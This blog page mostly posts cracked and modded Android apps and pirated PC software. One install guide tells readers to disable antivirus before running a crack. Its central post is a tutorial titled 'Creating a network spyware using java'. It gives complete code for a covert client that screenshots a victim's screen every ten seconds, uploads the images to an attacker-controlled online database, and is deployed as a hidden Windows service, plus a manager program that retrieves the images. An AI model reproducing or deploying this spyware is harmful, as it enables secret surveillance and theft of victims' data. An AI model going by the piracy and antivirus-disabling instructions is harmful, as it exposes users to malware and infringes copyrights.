Trending
Loading...
  • New Movies
  • Recent Games
  • Tech Review

Tab 1 Top Area

Tech News

Game Reviews

Recent Post

Tuesday, 4 April 2017
App Cloner Premium v1.4.0 Beta Cracked APK

App Cloner Premium v1.4.0 Beta Cracked APK

App Cloner Premium
Using App Cloner you can create and install multiple copies of your existing apps.
Cloned apps run in parallel and work independently from their original apps. They will not receive automatic updates so you can keep and run a stable version alongside the original app.
Cloning can be useful to simultaneously use multiple logins in apps such as Facebook, Twitter or Skype but the real fun starts by messing around with an app. App Cloner offers a multitude of options to tweak the new app copy, apart from changing the app name or icon.
For example, you can remove widgets or unnecessary permissions, you can disable auto-start, backups or intrusive app defaults. App Cloner can even extend a cloned app to add new functionality such as password protection, incognito mode with secure file deletion and you can lock an app to consume data over Wi-Fi only.
By the way, Android Wear watch apps and watch faces can typically also be cloned.
Full version features
  • Facebook Messenger cloning
  • WhatsApp cloning
  • Replace launcher icons
  • Create multiple app clones
  • Clone watch apps or watch faces
  • Save or share cloned apps
  • Remove launcher icon or widgets
  • Allow/prevent app backups
  • Allow apps to be installed on the external SD-card
  • Disable app defaults
  • Disable auto-start
  • Exclude app from recents
  • Rotation lock
  • Remove app permissions
  • Make assist app
  • Enables multi-window support on Samsung devices and some LG devices
  • Use Google Maps in cloned apps
  • Automatically copy expansion files during cloning
  • Make debuggable
WHATS CRACKED
  • Premium features Unlocked
  • Batch Cloning Unrestricted
WHAT’S NEW
  • APK file cloning without prior app installation
How to Install ?
  1. Download & Install the Apk from the links given below
  2. Done ! Enjoy 
SCREENSHOTS


Download & Links
Saturday, 1 April 2017
FAR CRY PRIMAL APEX EDITION

FAR CRY PRIMAL APEX EDITION


ABOUT THE GAME

Welcome to the Stone Age, a time of extreme danger and limitless adventure, when giant mammoths and sabretooth tigers ruled the Earth and humanity is at the bottom of the food chain.

Title: Far Cry® Primal
Genre: Action, Adventure
Developer: Ubisoft
Publisher: Ubisoft
Release Date: 1 Mar, 2016

Repack Features:
• Based on Far.Cry.Primal-CPY ISO release
• Far Cry Primal: Wenja Pack DLC included
• Far.Cry.Primal.HD.Texture.Pack-PLAZA (3 GB) added
• NOTHING ripped, NOTHING re-encoded
• Selective download feature - you can skip downloading and installing of Ultra HD textures
• Installation takes 7-20 minutes (depending on your system)
• HDD space after installation: 20 GB (~23 GB during installation)
• Language can be changed in game settings - GUI and subtitles separately

Far Cry Primal Apex Edition
Size: 9.5 GB
SYSTEM REQUIREMENTS 
SCREENSHOTS



Download Links(4 Torrents)


EaseUS Data Recovery Wizard v10.8.0 Final + Crack

EaseUS Data Recovery Wizard v10.8.0 Final + Crack

 Description : EaseUS Data Recovery Wizard 10.5.0 The all-inclusive EaseUS data recovery solution mainly for service providers, business, organizations, companies, IT professionals, system admins, technicians and consultants.
Features :
  • Easy and secure file recovery software.
  • Recover lost files exactly through quick and deep scan modes
  • Flexible data recovery solution.
  • Just 3 Simple Steps to Recover Lost Data.
  • Apply to different loss situations and support all sorts of file types.
  • Import and export scanning results whenever necessary.
  • Clear preview before recovery ensures successful recovery.
Instruction :
  1. Install Setup And Don’t Run It. If Running Then Quit.
  2. Turn Off Your Virus Guard
  3. Run Crack.
  4. Click On Activate & Wait till a message comes up
  5. Now Use Keygen To Register Product
  6. That’s It ! Enjoy
Screenshots :


Downloads :

Setup

Crack
Sunday, 26 March 2017
Creating a network spyware using java

Creating a network spyware using java

According to wikipedia


Spyware is software that aims to gather information about a person or organization without their knowledge, that may send such information to another entity without the consumer's consent, or that asserts control over a device without the consumer's knowledge.
Spyware is basically used to transmit data from host's computer  to the hacker without their prior knowledge.


[Before Starting and going any deep in to the  topic i want to make it very clear that all the programs and coding describe below are for educational purpose only.If it causes any damage to the person who is using it or to the person on whom it is used author or the website takes no responsibility ]


Before Starting 


This tutorial will tell you everything which you will need to make a fully packed spy ware for yourself.
It will provide you with all the program codes and links to the required software's.

What all you need


Before starting here is a checklist of  tools and software you will be needed to make this spyware.

1)Java Development Kit(JDK)
2)MySQl connector for java.:- In order to use sql database in java program.
    NOTE :- you need not to have a MySQL database.If you have it then also it will never be needed.
3)Any java IDE.

Here i am assuming that you have install and configure everything listed above if you have found in any problem in doing so then you could google it.


Spyware's working


Our spyware is simple and could be made easily with less coding.It regularly takes screen capture after a specific interval (may be 5 sec to 10 min per screen shot depending upon database size)  of the client (where you have deploy the virus) and stores it on an online database which is administered by you.
There are two different programs which will work on two different platforms.
1) Our main virus program(Uploader.java) which will capture regular screen shot and upload it to database will run on the  client machine.
2) Our manager program(Manager.java) will run on our machine and it will regularly download the screenshot from database and cleans the database for new screenshots to be uploaded.


Need of an online free SQL database


I am sure that from our spyware working you could have guess out that this virus need a online database to function.Although there are many in the list you have to select a better and faster one with remote connections  available(most important) .
You could google it to find one for you or check this list for top hosting sites.But still i think you should use
Free SQL Database, however it provides only 5 MB of space but it is fast and reliable.

Once you have created you account you can create a database and an email will be send to you with the following details :-

Database Host            : -<Your database host>
Database  Username   :-<Your database username>
Database Password    :-<Your database password>

Just copy it somewhere as you will need it very often.


Designing Our Database 

Our database is very simple and contains only 1 table with 2 column (id ) and (imagedata) where id stores image index and data stores image itself.

Below in your account page there is a link for phpmyadmin click there a login form will be shown as below.



Where ,
                   server is Database Host
                   username is Database Username
                   and Password is Database password which you got from the Hosting site

Once you have successfully login  then on the menu tab ,select your database and then you will find (SQL) menu just click on it and run this sql code.



CREATE TABLE  `images` (
`id` int(10) unsigned NOT NULL auto_increment,

`image` longblob NOT NULL,
PRIMARY KEY (`id`)
);


This will create table images in your database with two columns id and image.

Here comes the end of database designing.

Programming client side virus,Uploder.java

This class uses the Robot class of java to capture screen shot and store it onto the database .
Here is the code for the Uploder.java file.






@author Quadgen -shashank sahu
package databaseVirus;

import java.awt.AWTException;
import java.awt.Dimension;
import java.awt.Rectangle;
import java.awt.Robot;
import java.awt.Toolkit;
import java.awt.image.BufferedImage;
import java.io.ByteArrayOutputStream;
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.PreparedStatement;
import java.sql.SQLException;

import javax.imageio.ImageIO;


class Uploder
{

public static Connection getConnection()
{

String driver = "YOUR DATBASE HOST HERE";
String url = "jdbc:mysql://<YOUR DATBSE HOST>:3306/<DATABASE USERNAME>";
String u = "<DATABASE USERNAME>";
String p = "<DATABASE PASSWORD>";
try {
Class.forName(driver);


} catch (ClassNotFoundException e) {

getConnection();
}
Connection conn = null;
try {
conn = DriverManager.getConnection(url, u, p);
}
catch (SQLException e) {
getConnection();

}
return conn;
}
static Connection conn;
public static void main(String args[])throws Exception
{
conn = getConnection();
int fre=10000;//10 seconds, defines screen shot per 10 seconds
while(true)
{
try{



BufferedImage originalImage=getImage();
ByteArrayOutputStream baos = new ByteArrayOutputStream();
ImageIO.write(originalImage, "jpg", baos);
byte[] imageInByte = baos.toByteArray();
String insertImageSql = "INSERT INTO "
+ "images(image)"
+ " VALUES(?)";
PreparedStatement preparedStatement = conn.prepareStatement(insertImageSql);
preparedStatement.setBytes(1, imageInByte);
preparedStatement.executeUpdate();

Thread.sleep(fre);

}



catch(Exception e)
{
continue;
}



}



}
public static BufferedImage getImage() throws AWTException
{
Dimension screenDim = Toolkit.getDefaultToolkit().getScreenSize();
Robot robot = null;

robot = new Robot();



BufferedImage image = robot.createScreenCapture(new Rectangle(0, 0, (int) screenDim.getWidth(),(int) screenDim.getHeight()));
return image;



}


}
dfdfd

NOTE   

You have to enter your own Database USERNAME and PASSWORD as and when required.
 Also you could change the fre(frequency ) variable as per you requirement don't set it too low                         otherwise you will end your 5 MB space in a minute or two.(Remember 1sec=1000 milli seconds)
The above program is designed in a way if some error occur which might be no internet connection or library load failure or could not capture image or database space is full then it will automatically handel it and by entering into a infinite loop until the exception ends.(E.g. Internet Connection regained).


Programming manager program (Manager.java) 


This program will be executed by the hacker it will clean the database after successfully  downloading and storing  all the  screen shot uploaded by the client.

Manager.java




import java.io.FileOutputStream;
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;





public class Manager
{
static int start,end;

public static Connection getConnection()
{
String driver = "YOUR DATBASE HOST HERE";
String url = "jdbc:mysql://<YOUR DATBSE HOST>:3306/<DATABASE USERNAME>";
String u = "<DATABASE USERNAME>";
String p = "<DATABASE PASSWORD>";
try {
Class.forName(driver);


} catch (ClassNotFoundException e) {

getConnection();
}
Connection conn = null;
try {
conn = DriverManager.getConnection(url, u, p);
}
catch (SQLException e) {
getConnection();

}
return conn;
}
static Connection conn;
public static void main()throws Exception
{
conn=getConnection();
Statement stmt = conn.createStatement();
ResultSet rs = stmt.executeQuery("SELECT * FROM images");
int id = 0;
start=0;
end=0;
if (rs.next() == false) {
System.out.println("No image is found in database ");

}
else {
start=rs.getInt(1);
do {
id = rs.getInt(1);
byte[] image = rs.getBytes(2);
FileOutputStream fileOutputStream = new FileOutputStream("D:/"+id+".png");
fileOutputStream.write(image);
System.out.println("\nImage successully retrieved from database. Id of image:"+ id );
fileOutputStream.close();
} while (rs.next());
}
end=id;
String sql = "DELETE FROM images " +
"WHERE id<="+id+"";
stmt.executeUpdate(sql);
System.out.print("deleted record "+start+" to "+id);
System.out.print((id-start+1)+"files Downloaded");
stmt.close();
rs.close();
conn.close();

}




}



Packaging and deploying

You could now easily convert your Uploder.java  program into a window service by the tools which are available on net.A window service could run on the host when the computer start and stops when the computer stops.It also runs on the background so there is no need for user interference.
Look here if you want to know how to do that.

Hope this help you if yes then tell more of your friends about it.Enjoy.
Also you could leave comment if you need any help from me.

PicsArt Photo Studio v9.0.3 Unlocked APK

PicsArt Photo Studio v9.0.3 Unlocked APK

PicsArt Photo Studio
It’s not just the photo editor, where you can add a background, change the color and other standard features. Here you can find almost everything that could be combined in a single application, and even more so, there is a drawing tool! Also, this app includes a social network, so that your photos you can upload right here. Share your photos, or look at pictures of other people around the world!
Features
  • The social network for creative people
  • Hundreds of tools for photo editing
  • Filters and effects settings
  • Ability to add text labels and images
  • collage master
  • Camera
  • A tool for the professional painting
  • Additional paint brushes
WHAT’S NEW
  • This release is *abuzz* with bug fixes (get it?)
How to Install ?

  1. Download & Install the Apk from the links given below
  2. Done ! Enjoy 
Screenshots

Download & Links

DU Battery Saver v4.6.0.1

DU Battery Saver v4.6.0.1

DU Battery Saver & Phone Charger 
DU Battery Saver, the world’s leading battery saver and Android power doctor & manager, is a FREE battery saving app that makes your battery last longer! Get up to 50% more battery life for Android phones or tablets! With DU Battery Saver’s smart pre-set battery power management modes, one-touch controls and healthy charge stage features, solve battery problems and extend your battery life.
Highlights of DU Battery Saver (Android power doctor & manager):
★ Fast Battery Saver: Instantly find and solve battery problems with the “Optimize” button.
★ Simple Battery Saver: Use smart pre-set battery power management modes or create your own to get high performance and great energy savings.
★ Effective Battery Saver: Protect your battery with healthy charging to extend life of your battery.
★ Convenient Battery Saver: The home screen “Optimize” widget allows you to stop power consumptive background apps with one tap to boost battery life.
★ Easy & Powerful Battery Saver: Extend your Android battery life by up to 50% without charging.
★ Global Battery Saver: Supports Deutsch, Español, English, Française, Português, Português do Brasil, Pусский, Türk, Bahasa Indonesia, Italiano, العربية, ภาษาไทย, Tiếng Việt, 日本語, 한국의, 中文(简体), and 中文(繁體).
Features and Benefits of DU Battery Saver (Android power doctor & manager):

► ACCURATE STATUS: See exactly how much battery charge you have left with a detailed analysis of your Android apps AND hardware;
► SMART PRE-SET MODES: Choose or customize a mode that fits your energy stage;
► ONE-CLICK OPTIMIZATION: Instantly find and fix battery power consumption problems and unlock detailed settings to super-tune your energy savings;
► ANYTIME OPTIMIZATION: Manage background apps and phone hardware easily with the smart home screen widget;
► BETTER BATTERY DETAILS: View your phone’s battery power level by percentage or by time remaining;
► HEALTHY CHARGE STAGE MANAGER: Track and implement healthy charging practices in different stage s to keep your battery working its best;
Mod Fashion
Pro Features Unlocked already, which only available only when you complete given tasks or pay some real money ….
How to install ?
  1. Download a copy of this app..
  2. Uninstall Previous Version.
  3. Install normally.
  4. Done !
Downloads
Saturday, 25 March 2017
Piano Tiles 2 v3.0.0.401 Mega MOD APK

Piano Tiles 2 v3.0.0.401 Mega MOD APK


Piano Tiles 2
Piano Tiles 2 is the sequel to the hugely popular game Piano Tiles (Don’t Tap the White Tile). New gameplay, first-class sound quality and a global competition mode give your fingers a fast paced thrill with the elegance of piano playing!
How To Play
  • The rules are clear: just tap the black tiles to the music and avoid tapping anywhere else.
  • Try it out, enjoy the piano music, train your fingers to be faster, and see if you can beat your friends!
MOD  Fashion
  • Unlimited Gems
  • Free Shopping
  • Infinite Energy
  • Massive Coins For Daily Rewards
  • Song Unlock Level Require Reduced to 1
Note: Diamond is infinite, even if it shows 0 you can still buy, remove the VIP and diamond purchase, force all the songs for the notes to buy!

How To Install ?
  1. Download the apk given here
  2. Put it on your phone and Install the apk
  3. Thats all Enjoy 
How To FiX FB Login?
  • Login to Facebook.
  • Go to Apps
  • Find piano tiles
  • Remove app
  • Now login again from piano tiles latest version.
Screenshots
piano tiles screen shot 1piano tiles screen shot 2

Download Links
Copyright © 2012 gogfmj All Right Reserved
Designed by Odd Themes - Published By Blogger Templates20
Back To Top